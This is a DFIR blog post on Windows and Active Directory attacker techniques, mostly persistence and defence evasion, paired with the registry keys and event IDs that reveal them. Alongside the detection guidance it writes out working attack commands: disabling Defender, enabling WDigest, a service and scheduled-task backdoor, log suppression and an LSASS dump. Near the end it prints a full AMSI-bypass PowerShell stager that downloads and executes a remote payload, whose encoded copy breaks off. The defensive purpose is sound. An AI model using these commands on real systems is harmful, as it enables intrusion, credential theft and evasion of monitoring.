DFIR: Windows and Active Directory Attacks and Persistence

Today I would like to focus on an improved version of my previous blog post about DFIR in Windows & Active Directory. We will cover examples of different attacker’s techniques and ways how attackers could persist in an environment. This will include things from executing the techniques by ourselves, to diving into the traces that it leaves behind, and much more. We won’t just cover attacker’s techniques, but also other things like, host reconnaissance on a machine. At that part, we will cover different configuration settings that attackers tend to look at, when achieving a foothold. This can be relevant as well, when looking at it from a DFIR perspective.

In order to understand something, we have to do it by ourselves. I truly believe, that it’s the only way to learn something (better). Understanding an technique is one thing, but executing and gather context around it, is the second.

At the end of this blog post, there will be a list of references that I have used. I’ve decided to make this, so I wouldn’t forget all the stuff around On-Premises. It was a good refresher to understand how easily it is to execute an attack and persist in an environment. All of the described techniques have not explained in detail, but more in a high-level overview with screenshots.

The goal of this blog post is mainly to be aware of the ”bigger” picture. What I mean with this is, that once an attacker has elevated their privileges to a Domain Admin or Enterprise Admin. All the doors are becoming wider and there are multiple ways to persist in an environment. Yes, I’m confident that there are more persistence out there, which I have not covered.

I hope this can blog post can give a good overview for DFIR folks, so they can be aware of some of the potential persistence that can be configured within AD.

Windows

During this section, we will focus only on the Windows Operating System. This will include things from host reconnaissance to executing well-known techniques and many more.

  1. Host Reconnaissance

Host reconnaissance is an important aspect of an attacker, because it will be helpful to gather information once an attacker has access to a machine. An important thing to look at it from an attackers point of view, would be the relevant security features that are enabled/disabled, and the directories, folders, and processes that have been excluded from AV for example. The primary focus will be on the exclusions, since these are likely going to get abused.

  • Directory & Folders – Exclusion in AV

Windows Defender allows to have an exclusion list for specific directories and folders. Once an exclusion has been set, AV won’t scan anything, that is being executed from the excluded directories or folders.

All the exclusions of folders and directories can be found by running the following command:

Command

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"

Result

At the sample result, we can see two folders being excluded.

A lot of enterprise organizations are managing their workstations via SCCM. Exclusions of specific folders and directories can be excluded via SCCM as well, which means that the registry key, that specifies all the exclusions would be different than a machine that is not managed via SCCM. All the exclusions that have been set via SCCM will override the exclusions, that are manually added.

Command

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\exclusions\paths"

Result

At the sample result, we can see different folders and directories being excluded.

  • Windows Processes – Exclusion in AV

Processes that are running on a machine can be excluded as well from Windows Defender. An attacker could for example create an exclusion to exclude their leet hacker tools.

Command

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes"

Result

At the sample result, we can see one exclusion.

A lot of enterprise organizations are managing their workstations via SCCM. Exclusions of specific processes can be excluded via SCCM as well, which means that the registry key, that specifies all the exclusions would be different than a machine that is not managed via SCCM. All the exclusions that have been set via SCCM will override the exclusions, that are manually added.

Command

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\exclusions\processes"

Result

At the sample result, we can see a couple of processes that have been excluded.

  • Extension – Exclusion in AV

Extensions can be excluded in Windows Defender. You can think of extensions with the likes of .ps1, .vbs, and so on.

Command

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions"

Result

At the sample result, we can see that one extension has been excluded.

A lot of enterprise organizations are managing their workstations via SCCM. Exclusions of specific extensions can be excluded via SCCM as well, which means that the registry key, that specifies all the exclusions would be different than a machine that is not managed via SCCM. All the exclusions that have been set via SCCM will override the exclusions, that are manually added.

Command

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\exclusions\extensions"

Result

At the sample result, we can see one extension being excluded.

  • Windows Defender Signatures – Removed?

An attacker can leave Windows Defender enabled, but remove all the signatures. In order to remove all the signatures, we have to run the following command as an admin.

Command

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

If we now run the following command.

Command

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls"

Result

We can see that the values in this specific registry key is empty, which indicates that the signatures have been removed.

  • Real-Time Protection – Disabled or not?

Real-time protection is a security feature that helps stop malware from being installed on your device. This feature is built into Microsoft Defender, a comprehensive virus and threat detection program that is part of the Windows 10 security system. An attacker can disable Real-Time Protection.

This can achieved by running the following command as an admin.

Command

Set-MpPreference -DisableRealtimeMonitoring $true

If we now run the following command to check if Real-Time Protection has been disabled.

Command

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring

Result

We can see that Real-Time Protection has been disabled, because the ‘DisableRealtimeMonitoring’ value has been set to 0x1.

A lot of enterprise organizations are managing their workstations via SCCM. Managing the setting of Real-Time Protection can be done via SCCM as well, which means that the registry key, that specifies if Real-Time Protection has been disabled or not, would be different than a machine, that is not managed via SCCM.

Command

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\real-time protection" /v DisableRealtimeMonitoring

Result

At the sample result, we can see that the registry key is different. Here we can see that the ‘DisableRealtimeMonitoring’ value has been set to 0x0, which means that it’s enabled.

  • Script Scanning – Disabled or not?

Script Scanning is a security feature in Windows Defender AV and it already tells what it is, but it’s a feature that scans for ‘malicious’ scripts. This can be disabled by an attacker though.

In order to disable script scanning, we have to run the following command as admin.

Command

Set-MpPreference -DisableScriptScanning $true

If we now check the registry key of Script Scanning…

Command

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning

Result

We can see that Script Scanning has been disabled, because the ‘DisableScriptScanning’ value has been set to ‘0x1’

A lot of enterprise organizations are managing their workstations via SCCM. Managing the setting of Script Scanning can be done via SCCM as well, which means that the registry key, that specifies if Script Scanning has been disabled or not, would be different than a machine, that is not managed via SCCM.

Command

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\real-time protection" /v DisableScriptScanning

Result

At the sample result, we can see that the ‘DisableScriptScanning’ has been set to 0x0. This means that it is not disabled.

  • ASR Rules – What rules are active?

ASR rules target specific types of behavior that is typically used by malware and malicious apps to infect devices. That includes protection against files and scripts used in Office apps, suspicious scripts, unexpected behavior of apps and more.

In most enterprise organizations, this is (usually) done via MDM or SCCM. However, this example will assume that the ASR rules have been configured through SCCM.

In order to find out, which ASR rules are configured on a machine.

Command

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v ASRRules

Result

At the sample result, we can see different ASR rules that have been configured on a machine. This includes if the rule is on audit mode or block mode.

  • ASR Rules – Exclusions

Directories, folders, and processes can be excluded from ASR rules, just like Windows Defender AV. All the exclusions can be found on a machine.

Command

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v ASROnlyExclusion

Result

At the sample result, we can see a couple of processes that have been excluded from ASR.

  • Tamper Protection – Disabled or enabled?

Tamper Protection is a security feature that was introduced in Windows 10 version 1903, otherwise known as the May 2019 Update. When enabled, Tamper Protection prevents Windows Security and Windows Defender settings from being changed by programs, Windows command line tools, Registry changes, or group policies.

In order to find out if Tamper Protection has been disabled or enabled.

Command

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection

Result

At the sample result, we can see that Tamper Protection has been disabled. The value ‘TamperProtection’ is set to 0x0.

2. Insecure configurations and persistence

This section will focus primary on insecure configurations that an attacker can set on a machine to make it more vulnerable for attacks.

  • WDigest – Downgrade

Digest Authentication is a challenge/response protocol that was primarily used in Windows Server 2003 for LDAP and web-based authentication.

An attacker can enable the WDigest protocol to obtain the password in plain-text, when dumping credentials from memory. In order to enable WDigest, we have to modify a registry value.

Command

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

In order to see if WDigest is enabled or not.

Command

reg query HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential

Result

We can see in the result that WDigest has been enabled, because the ‘UseLogonCredential’ value has been set to ‘0x1’.

Why do attackers enable WDigest?

Enabling the WDigest protocol allows the password to be stored in plain-text, so that means. Once the credentials have been dumped from memory. Attackers can use the plain-text password of a user, instead of using the NT hash. Using the NT hash requires more effort, because the attacker would have to use a pass the hash attack, etc.

  • Enable RDP locally for persistence

An attacker can enable RDP locally on a machine to remain persistent.

In order to do this, we have to run the following command:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

If we now run the following command:

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

Result

We can see that RDP has enabled, because the value ‘fDenyTSConnections’ value has been set to ‘0x4’.

  • Allowing multiple RDP sessions

An attacker can make a change to allow multiple RDP sessions on a targeted machine. In order to do this, we have to modify a registry value.

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

This can be achieved as well by running the following command:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

What we now can see is that an attacker can has multiple RDP sessions to the targeted machine, as we can see here.

To see if multiple RDP sessions have been configured on a machine. We can run the following commands to retrieve the information. There are two registry keys to keep an eye on.

Command

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser

Result

At the sample result, we can see that ‘fSingleSessionPerUser’ value has been set to 0x0, which means that the RDP session limitation has been removed.

Command 2

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser

Result 2

At the sample result, we can see that ‘fSingleSessionPerUser’ value has been set to 0x0, which means that the RDP session limitation has been removed.

  • RDP shadow sessions

An attacker can enable RDP shadow session to have full remote control of a user’s session without their permission. In order to do this, there are two options. However, we will only show one example out of the two.

In order to enable RDP shadow session with full control permission, we can run the following command:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 2

This means that we can now disconnect a user and still sign-in to the machine via RDP without asking their permission.

If we want to find out if RDP shadow session has been enabled. We have to run the following command:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow

Result

At the sample result, we do see that RDP shadow session has been enabled. Because of the ‘Shadow’ value with 0x2. 0x2 means ‘Full control without user permission’, while 0x4 means ‘View session without user permission’

  • logonscript

Logon script that will execute something once a machine has been booted up.

In order to find out if an executable has been set. We can run the following command:

reg query HKCU\Environment /v UserInitMprLogonScript

Result

At the sample result, we can see that cmd.exe has been set to start once a machine has been booted up. We can recognize this with looking at the value ‘UserInitMprLogonScript’

  • hklmrun

This is a just another registry persistence. In order to let an executable ran once a machine is booted up again. We can run the following command as an example:

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Windows\System32\calc.exe"

In order to find if something has been set. We can run the following command:

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

Result

At the sample result, we can see two examples.

  • hklmrunonce

This is a just another registry persistence. In order to let an executable ran once a machine is booted up again. We can run the following command as an example:

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil2 /t REG_SZ /d "C:\Windows\System32\calc.exe"

In order to find if something has been set. We can run the following command:

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"

Result

  • Registry key startup persistence

There a bunch of registry startup persistence, so covering all of them one by one might take a while. Here is a list of all the other registry keys that needs to be reviewed.

Command

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"

reg query "HKCU\Environment" /v UserInitMprLogonScript

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices"

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
  • No logs to security event logs

Once an attacker adds a registry key called “MiniNt” at the following path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

It is able to crash the security event logs, so no logs will be generated in the security event logs.

In order to do this, we have to run the following command:

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt”

In order to find out if this registry key has been set:

reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt”

Result

  • Hide account from Windows/logon screen

Attackers tend to hide an compromised account username from a Windows logon screen.

In order to do this, we can run the following command as example:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v DefaultUser /t REG_DWORD /d 0 /f

In order to find out if this has been set, we can run the following command:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"

Result

  • Modifying existing service

Attackers can modify existing services to remain persistent. Here is an example of how an attacker could modify the ‘DmEnrollmentSvc’ service for example to remain persistent on a targeted machine.

Command

sc config DmEnrollmentSvc binpath= "C:\Windows\System32\cmd.exe /c net localgroup Administrators Backdoor /add" start="auto" obj="LocalSystem"

Result

At the sample result, we can see that we have added an account to the local Administrators group on the targeted machine.

  • Scheduled Task

One of the most common technique, but an attacker could also create a scheduled task to execute something. In this example, we are executing a .bat file, which will add an account to the ‘Remote Desktop Users’ group of a machine.

Command

schtasks /create /sc minute /mo 1 /tn "eviltask" /tr C:\Users\Jones\Desktop\cmd.bat /ru "SYSTEM"

Result

At the sample result, we can see that the ‘Backdoor’ account has been added to the Remote Desktop Users group of the machine. Even when we will remove the user from the group. The scheduled task will run every minute as SYSTEM to ensure that the ‘Backdoor’ account is part of the local Remote Desktop Users group.

  • Group Policy startup script

Startup scripts in Group Policy can run scripts before the boot process, which can be persistence trick of an attacker. The following registry key needs to be reviewed properly.

Command

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0"

Result

At the sample result, we can see the location of where the startup script is stored, etc.

3. Event Logs

This section will put the focus on reviewing event logs. There are different things that can be relevant to take a look at, because it may provide some evidence of attacker’s activity. We will start with some common techniques that are used in the wild and show the traces that it leaves behind.

  • BITS Jobs

AdAdversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.

We can run the following command as an example:

Start-Sleep -s 20; start-process PowerShell -windowstyle hidden -verb runas -argumentlist @('-command','start-bitstransfer "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1" -Destination "C:\Users\MrEvil\Desktop\Invoke-Kerberoast.ps1"')

This can be done as well with the bitsadmin.exe utility, which we can use here:

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 60 > nul & C:\Windows\System32\cmd.exe /c bitsadmin.exe /transfer EvilJob https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 C:\Users\MrEvil\Desktop\ASREPRoast.ps1

Result

We can look at ‘Microsoft-Windows-Bits-Client/Operational‘ and filter on event ID ‘16403‘, which will display all the BITS jobs that were created.

Here we can see an example:

False-positives

Looking at event ID 16403 may also lead to some false-positives, which we need to be aware. This helps us to be more efficient, when investigating malicious BITS Jobs. The following BITS Jobs can be considered as false-positives.

Chrome Component Updater.*gvt1.com & .*google.com & .*googleapis.com
SpeechModelDownloadJob & MDMSW Job.*azureedge.net
Edge Component Updater.*microsoft.com
Microsoft Outlook Offline Address Book.*office365.com
UpdateDescriptionXml & PreSignInSettingsConfigJSON.*live.com
UpdateBinary.*sfx.ms
CCM Message Upload
CCMDTS Job
GoogleUpdateSetup.crx3.*clients2.google.com
  • System Services: Service Execution

Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. PsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.

Command

PsExec.exe \\Server42 cmd.exe

Result

At the sample result, we can see that a new service has been installed on a machine. This can be seen at the ‘System‘ event logs and by filtering on event ID ‘7045‘. PsExec can be renamed, which can make it harder to find for it.

False-positives

Every time, when PsExec has been used to execute a command on a remote system. It will create a new service and we will see event ID 7045. However, there are also legitimate service installs that we have to be aware of. Here is a list of examples.

Understanding what can be normal helps us to be more efficient in finding PsExec or equivalent behavior.

Service NameService File NameService TypeService Account
DBUtilDrv2 ServiceSystemRoot\System32\drivers\DBUtilDrv2.syskernel mode driver
MpKsl*C:\ProgramData\Microsoft\Windows Defender\Definition Updates\*kernel mode driver
Microsoft Intune Management ExtensionC:\Program Files (x86)\Microsoft Intune Management Extension\*user mode serviceLocalSystem
Microsoft Monitoring Agent Azure VM Extension Heartbeat ServiceC:\Packages\Plugins\*user mode serviceLocalSystem
Microsoft Monitoring Agent APMC:\Program Files\Microsoft Monitoring Agent\*user mode serviceLocalSystem
Microsoft Monitoring Agent Audit ForwardingC:\Windows\system32\AdtAgent.exeuser mode serviceNetworkService
Microsoft Monitoring AgentC:\Program Files\Microsoft Monitoring Agent\*user mode serviceLocalSystem
Visual Studio Standard Collector Service 150C:\Program Files (x86)\Microsoft Visual Studio\*user mode serviceLocalSystem
GoogleChromeElevationServiceC:\Program Files\Google\*user mode serviceLocalSystem
gupdatemC:\Program Files (x86)\Google\*user mode serviceLocalSystem
Windows Azure Guest AgentC:\WindowsAzure\Packages\*user mode serviceLocalSystem
RdAgentC:\WindowsAzure\Packages\WaAppAgent.exeuser mode serviceLocalSystem
  • Remote Services: Remote Desktop Protocol

Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Let’s say that user Jon is initiating a RDP session from the Client machine to the Server machine. What traces would left behind?

The first place we should look at is ‘Microsoft-Windows-TerminalServices-RDPClient/Operational‘ and then filter on ‘1102‘. Here we can see on the Client machine that we’ve made a RDP connection to 10.1.0.8

On the remote machine that we made a RDP connection to. We can see an event log as well, which can be found at ‘Microsoft-Windows-TerminalServices-LocalSessionManager/Operational‘ and then filter on event ID ‘25‘.

  • Windows Remote Management

Adversaries may use valid Accounts to interact with remote systems using Windows Remote Management (WinRM). When doing forensics to determine whether an adversary was using Windows Remote Management to move laterally. We can start looking at ‘Microsoft-Windows-Windows Remote Management‘ and filter on event ID ‘6‘. I’ve learned from others that, there are ways around in using WinRM to move laterally without generating an event log. This is something to keep in mind.

However, that’s been said. Here is a very simple example on using WinRM to connect against a remote system.

winrs -r:Server42 cmd.exe

Result

At the sample result, we can see that a WinRM session has been established with a remote system.

  • Modifying Windows Firewall rules

During the Kaseya ransomware attack. The attackers were making a change to the Windows firewall settings to allow, the local Windows system to be discovered on the local network by other computers. In order to do this, we can run the following command:

netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes

Result

At the sample result, we will see an event ID ‘2005‘ that is located at ‘Microsoft-Windows-Windows Firewall With Advanced Security/Firewall’. We can see the rule name as well, which is ‘Network Discovery’.

Attackers can also modify the Windows Firewall rules to enable RDP.

netsh firewall set service type = remotedesktop mode = enable
  • Windows Defender AV

Windows Defender AV can be one of the best places to look at first to see if there were any alerts being triggered in the first place. This can be a useful pivot point. Let’s try to use Rundll32.exe to dump LSASS and see what alert would have been triggered by AV.

Command

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

Result

At the sample result, we can see event ID ‘1116‘ at ‘Microsoft-Windows-Windows Defender/Operational

  • WMI Event Filter – Persistence

Adversaries can use the ActiveScriptEventConsumer and CommandLineEventConsumer classes when responding to their events. Both event consumers offer a tremendous amount of flexibility for an adversary to execute any payload they want without needing to drop a single malicious executable to disk.

Great thing with Windows 10 & Windows Server 2016 and higher is, that we can look at event ID 5861 in Microsoft-Windows-WMI-Activity/Operational. This event may potentially indicate a persistence.

Result

At the sample result, we can see event ID 5861.

  • Suspicious PowerShell activities

Despite that most believe PowerShell is dead for APT groups. Well, the reality is. They are still leveraging PowerShell for exploitation, so it’s not dead as we may think it is. We will cover some examples that I’ve experienced during an pentest and also from other APT reports.

AMSI Tampering

IF($PSVersIONTaBLE.PSVerSION.MAJOr -Ge 3){$08C=[rEF].AsSembLY.GETTyPe('System.Management.Automation.Utils')."GETFIe`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static');If($08C){$C23=$08C.GeTVAlue($NULl);IF($c23['ScriptB'+'lockLogging']){$C23['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$c23['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$Val=[COLLECTIOnS.GEnErIC.DICTiONarY[STriNG,SySTEm.OBjeCt]]::neW();$VAL.Add('EnableScriptB'+'lockLogging',0);$val.Add('EnableScriptBlockInvocationLogging',0);$C23['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ELSE{[SCrIPTBLoCK]."GETFIe`LD"('signatures','N'+'onPublic,Static').SEtVALue($NULL,(NEW-OBjeCt COlLEcTIONs.GeNeRIc.HASHSET[stRINg]))}$REf=[REF].AssEmBlY.GeTTYpe('System.Management.Automation.Amsi'+'Utils');$Ref.GEtFielD('amsiInitF'+'ailed','NonPublic,Static').SEtVAlue($NULL,$tRuE);};[SYstEM.Net.SERVICEPoInTMAnAGEr]::EXpeCT100CoNTinuE=0;$299=New-ObjeCt SYsTem.NEt.WeBCLieNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TexT.EncOdinG]::UnICoDe.GetStRing([ConvErT]::FROmBase64STriNG('aAB0AHQAcAA6AC8ALwAxADAALgAxADIALgAyADgALgAxADUAOgA4ADAAOAAyAA==')));$t='/news.php';$299.HEAdeRs.Add('User-Agent',$u);$299.PRoXy=[SySTEm.NEt.WEbREqUest]::DeFauLTWEBPRoxy;$299.PROXy.CredeNTiaLs = [SYsTEm.NeT.CreDeNTiaLCacHe]::DEFaULTNetWorKCredenTIalS;$Script:Proxy = $299.Proxy;$K=[SyStEM.TExT.ENcodinG]::ASCII.GETByTeS('-w,b=u7~eNhM2%QpT!5d{P[l#<gH*m6]');$R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXOr$S[($S[$I]+$S[$H])%256]}};$299.HEaderS.Add("Cookie","utRwUFJtCWhlwYu=kC1ovSMbX8WAbAoCRS4+2gC9Ll0=");$DaTa=$299.DOWNlOadDaTa($SER+$t);$iV=$DAtA[0..3];$DaTa=$dATa[4..$datA.lENgth];-JoIN[ChaR[]](& $R $DaTa ($IV+$K))|IEX

Encoded PowerShell command

powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBlAHIAcwBJAE8ATgBUAGEAQgBMAEUALgBQAFMAVgBlAHIAUwBJAE8ATgAuAE0AQQBKAE8AcgAgAC0ARwBlACAAMwApAHsAJAAwADgAQwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUAbQBiAEwAWQAuAEcARQBUAFQAeQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkAZQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJAAwADgAQwApAHsAJABDADIAMwA9ACQAMAA4AEMALgBHAGUAVABWAEEAbAB1AGUAKAAkAE4AVQBMAGwAKQA7AEkARgAoACQAYwAyADMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABDADIAMwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABjADIAMwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBsAD0AWwBDAE8ATABMAEUAQwBUAEkATwBuAFMALgBHAEUAbgBFAHIASQBDAC4ARABJAEMAVABpAE8ATgBhAHIAWQBbAFMAVAByAGkATgBHACwAUwB5AFMAVABFAG0ALgBPAEIAagBlAEMAdABdAF0AOgA6AG4AZQBXACgAKQA7ACQAVgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABDADIAMwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAEkAUABUAEIATABvAEMASwBdAC4AIgBHAEUAVABGAEkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAEwAdQBlACgAJABOAFUATABMACwAKABOAEUAVwAtAE8AQgBqAGUAQwB0ACAAQwBPAGwATABFAGMAVABJAE8ATgBzAC4ARwBlAE4AZQBSAEkAYwAuAEgAQQBTAEgAUwBFAFQAWwBzAHQAUgBJAE4AZwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBGAF0ALgBBAHMAcwBFAG0AQgBsAFkALgBHAGUAVABUAFkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcARQB0AEYAaQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAdQBlACgAJABOAFUATABMACwAJAB0AFIAdQBFACkAOwB9ADsAWwBTAFkAcwB0AEUATQAuAE4AZQB0AC4AUwBFAFIAVgBJAEMARQBQAG8ASQBuAFQATQBBAG4AQQBHAEUAcgBdADoAOgBFAFgAcABlAEMAVAAxADAAMABDAG8ATgBUAGkAbgB1AEUAPQAwADsAJAAyADkAOQA9AE4AZQB3AC0ATwBiAGoAZQBDAHQAIABTAFkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBMAGkAZQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AFQALgBFAG4AYwBPAGQAaQBuAEcAXQA6ADoAVQBuAEkAQwBvAEQAZQAuAEcAZQB0AFMAdABSAGkAbgBnACgAWwBDAG8AbgB2AEUAcgBUAF0AOgA6AEYAUgBPAG0AQgBhAHMAZQA2ADQAUwBUAHIAaQBOAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAEwAZwBBAHgAQQBEAEkAQQBMAGcAQQB5AEEARABnAEEATABnAEEAeABBAEQAVQBBAE8AZwBBADQAQQBEAEEAQQBPAEEAQQB5AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAMgA5ADkALgBIAEUAQQBkAGUAUgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAAyADkAOQAuAFAAUgBvAFgAeQA9AFsAUwB5AFMAVABFAG0ALgBOAEUAdAAuAFcARQBiAFIARQBxAFUAZQBzAHQAXQA6ADoARABlAEYAYQB1AEwAVABXAEUAQgBQAFIAbwB4AHkAOwAkADIAOQA5AC4AUABSAE8AWAB5AC4AQwByAGUAZABlAE4AVABpAGEATABzACAAPQAgAFsAUwBZAHM